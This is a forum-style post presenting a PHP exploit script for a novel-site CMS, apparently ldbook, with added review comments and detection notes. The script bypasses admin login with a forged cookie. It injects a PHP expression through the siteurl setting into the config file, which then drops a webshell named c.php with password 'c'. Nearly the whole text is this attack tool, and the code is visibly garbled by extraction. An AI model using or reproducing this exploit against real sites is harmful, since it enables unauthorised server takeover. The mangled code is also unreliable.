I have been looking at vulnerabilities for a while and recently learned how to write exploitation tools, so I picked a small vulnerability and wrote a tool for it. For a detailed overview of the vulnerability itself, see the write-up on t00ls; the script below only automates the steps described there.
<? Php
// NOTE(review): "<? Php" looks like an extraction artifact of the "<?php" open tag. This
// whole copy of the script is not runnable as-is: variable names contain spaces, the HTTP
// header lines have lost their "\r\n" terminators, and in post() one base64 literal has
// been replaced by the word "response". Read it as a description of the technique, not as
// a working tool.
// Lifts the script execution-time limit so the socket loops below are not cut short.
Ini_set ("max_execution_time", 0 );
// post(): sends a single HTTP POST to <path><adminpath>/admin_man.php?id=save with the form
// body held in $data. The only "credential" attached is the cookie "x_Cookie=admin";
// presumably the target accepts that cookie value as an admin session — the bypass itself
// is described in the t00ls write-up referenced above, not in this file.
//
// The siteurl field is a URL-encoded PHP expression:
//   ${${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(<shell body, base64>))}}
// "Yy5waHA" decodes to "c.php". If the target writes siteurl into its PHP config file
// unescaped, the ${${ ... }} variable-variable syntax makes PHP evaluate the inner
// fopen()/fputs() the next time that file is included, creating c.php in the web root.
// got() below forces that include by requesting /config.php. The second base64 literal
// (the content written into c.php) is garbled in this copy ("% response %"), so the exact
// shell body cannot be stated here.
//
// Parameters: $v_hosts = host name or IP to connect to (port 80, plain TCP, no TLS);
//             $v_paths = site path prefix on that host; $v_p = admin directory under it.
// Returns nothing. Exits the process (Die) if the connection fails or the response does not
// contain "alert".
//
// Detection notes grounded in this code: a POST to admin_man.php?id=save whose siteurl
// begins with "${${", a cookie literally "x_Cookie=admin", an MSIE 6.0 User-Agent and a
// Host header fixed to 127.0.0.1, followed by GETs to /config.php and /c.php (see got()).
// Only run this against systems you are authorised to test.
Function post ($ v_hosts, $ v_paths, $ v_p)
{
$ Host = $ v_hosts;
$ Path = $ v_paths;
$ Pa = $ v_p;
// Form body. cmdSave is a GBK-encoded submit label (appears to be 确认修改, "confirm changes");
// the meaning of flush/html/reurl is not visible from this file.
$ Data = "sitename = & siteurl = % 24% 7B % 24% 7 Bfputs % 28 fopen % 28base64_decode % 28Yy5waHA % 29% 2Cw % 29% 2Cbase64_decode % response % 29% 7D % 7D & email = & keywords = & flush = 6 & html = 1 & reurl = 1 & link = & tongji = & cmdSave = % C8 % B7 % C8 % CF % D0 % DE % B8 % C4 ";
// Raw HTTP/1.1 request built by hand. NOTE(review): no "\r\n" between the header lines in
// this copy — as written they would all be concatenated onto one line; almost certainly
// lost in extraction rather than present in the original.
$ Packet = "POST". $ path. $ pa. "/admin_man.php? Id = save http/ 1.1 ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded ";
$ Packet. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
// NOTE(review): Host is hard-coded to 127.0.0.1 instead of $host, so on a name-based
// virtual host the request lands on the default vhost, not the intended site.
$ Packet. = "Host: 127.0.0.1 ";
$ Packet. = "Content-Length:". strlen ($ data )."";
$ Packet. = "Connection: Keep-Alive ";
// The auth bypass: a bare cookie value, no session lookup on the client side.
$ Packet. = "Cookie: x_Cookie = admin ;";
$ Packet. = $ data;
// "@" hides the connect warning; the failure is reported via the check just below instead.
$ O = @ fsockopen ($ host, 80 );
If (! $ O ){
Echo "[x] does not return, and the website may not be accessible! ";
Die;
}
Fputs ($ o, $ packet );
$ I = "[x] waiting .";
Echo $ I;
$ B = ".";
// Reads the whole response. NOTE(review): $data still holds the request body at this point,
// so the response is appended to it and strstr() below searches both; the body contains no
// "alert", so the check is not affected in practice.
While (! Feof ($ o )){
$ Data. = fread ($ o, 1024 );
$ B. = ".";
Echo $ B;
}
Fclose ($ o );
// Success heuristic: the admin page's save handler is assumed to answer with a JavaScript
// alert. The needle is "alert " with a trailing space as written here — verify against the
// original before relying on it.
$ OK = strstr ($ data, "alert ");
If (empty ($ OK )){
Echo "[x] failed. As for the reason, find it for yourself! ";
Die;
} Else {
Echo "[O] Write configuration successful! ";
}
}
// got(): triggers and verifies the payload planted by post(). It opens one keep-alive
// socket to $g_hosts:80 and pipelines two GETs without reading in between:
//   1. <path>/config.php — if the injected siteurl was written into that file, including it
//      makes PHP evaluate the ${${...}} expression and write c.php;
//   2. <path>/c.php      — fetches the dropped file.
// Both responses are read into $data1 and searched for "huan", presumably a marker emitted
// by the shell; the shell body is not visible in this copy, so that cannot be confirmed.
// Parameters: $g_hosts = host name or IP; $g_paths = site path prefix.
// Returns nothing. On success prints the shell URL and the password "c"; otherwise Die.
Function got ($ g_hosts, $ g_paths)
{
$ Host1 = $ g_hosts;
$ Path1 = $ g_paths;
// First request: include config.php. Same missing-CRLF and hard-coded Host caveats as in post().
$ Packet1 = "GET". $ path1. "/config. php HTTP/1.1 ";
$ Packet1. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Packet1. = "Host: 127.0.0.1 ";
$ Packet1. = "Connection: Keep-Alive ";
// NOTE(review): unlike post(), the fsockopen() result is never checked; on a failed connect
// the fputs()/feof() calls below operate on false instead of exiting cleanly.
$ Fg = @ fsockopen ($ host1, 80 );
Fputs ($ fg, $ packet1 );
// Second request: fetch the dropped c.php.
$ Packet2 = "GET". $ path1. "/c. php HTTP/1.1 ";
$ Packet2. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Packet2. = "Host: 127.0.0.1 ";
$ Packet2. = "Connection: Keep-Alive ";
// Written before the first response is read — relies on the server honouring Keep-Alive and
// processing both requests on this one connection.
Fputs ($ fg, $ packet2 );
$ I = "[x] writing to shell .";
Echo $ I;
$ B = ".";
// NOTE(review): $data1 is never initialised before ".=" (notice on the first iteration).
While (! Feof ($ fg )){
$ Data1. = fread ($ fg, 1024 );
$ B. = ".";
Echo $ B;
}
// Success marker; the needle is "huan " with a trailing space as written here.
$ Ok1 = strstr ($ data1, "huan ");
If (empty ($ ok1 )){
Echo "[x] Not written? Find the cause by yourself. ";
// Die exits before Fclose below; the OS reclaims the socket on process exit.
Die;
} Else {
Echo "[O] Try webshell. [O] The address is http: //". $ host1. "/c. php. The password is c. ";
}
Fclose ($ fg );
}
// CLI entry point. Arguments: argv[1] = host, argv[2] = site path, argv[3] = admin path.
// empty() also rejects a literal "0" argument, which is fine for these values.
$ Hosts = $ argv [1];
$ Paths = $ argv [2];
$ P = $ argv [3];
If (empty ($ hosts) or empty ($ paths) or empty ($ p )){
// NOTE(review): the Print_r() argument is an unquoted banner in this copy; in the original
// it must have been a quoted string or heredoc — as shown it is not valid PHP. The example
// line reads as three arguments run together: host "localhost", path "/ldbook", admin "/admin".
Print_r ([x] Cold dy novel system vulnerability exploitation tool
[X] code by magic spring (bl4ck)
[-] Usage: php exp. php website address Website path background path
[-] Php exp. php localhost/ldbook/admin
);
Die;
}
// Order matters: post() plants the expression in the config, got() then triggers it by
// requesting config.php and checks whether c.php now exists. Each step Die()s on failure.
Post ($ hosts, $ paths, $ p );
Got ($ hosts, $ paths );
?>